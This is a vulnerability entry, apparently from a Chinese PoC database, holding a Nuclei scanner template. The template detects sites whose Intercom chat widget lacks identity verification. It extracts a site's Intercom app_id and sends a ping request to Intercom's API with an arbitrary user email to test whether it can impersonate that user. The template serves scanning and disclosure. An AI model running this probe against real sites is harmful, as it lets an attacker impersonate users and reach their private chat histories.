漏洞描述
Identity Verification is not setup on the Intercom widget, allowing an attacker to impersonate a user and access their chat history.
intercom-identity-misconfiguration: Intercom Identity Verification Misconfiguration
PoC代码[已公开]
id: intercom-identity-misconfiguration
info:
name: Intercom Identity Verification Misconfiguration
author: domwhewell-sage
severity: medium
description: |
Identity Verification is not setup on the Intercom widget, allowing an attacker to impersonate a user and access their chat history.
reference:
- https://medium.com/@hellother18/uncovering-a-vulnerability-in-intercom-widget-chat-configuration-e5633d06df60
- https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile
tags: intercom,unauth,exposure,misconfig,vuln
variables:
user_email: "test@example.com"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- "app_id:"
- "widget.intercom.io/widget"
internal: true
extractors:
- type: regex
name: intercom_app_id
part: body
group: 1
regex:
- 'app_id:\s*"([a-zA-Z0-9\-]+)"'
- "widget\\.intercom\\.io/widget/([^\"']+)"
internal: true
- method: POST
path:
- "https://api-iam.intercom.io/messenger/web/ping"
body: |
app_id={{intercom_app_id}}&user_data={"email":"{{user_email}}"}
matchers:
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- Input
# digest: 4b0a00483046022100f22b59730698973f763149193ceed8b88c9eb74758bd353e31dae9f2befd54180221009a70fb307c93c17bfeb18811c39277e3f13989613e264608d751aff483854a56:922c64590222798bb761d5b6d8e72950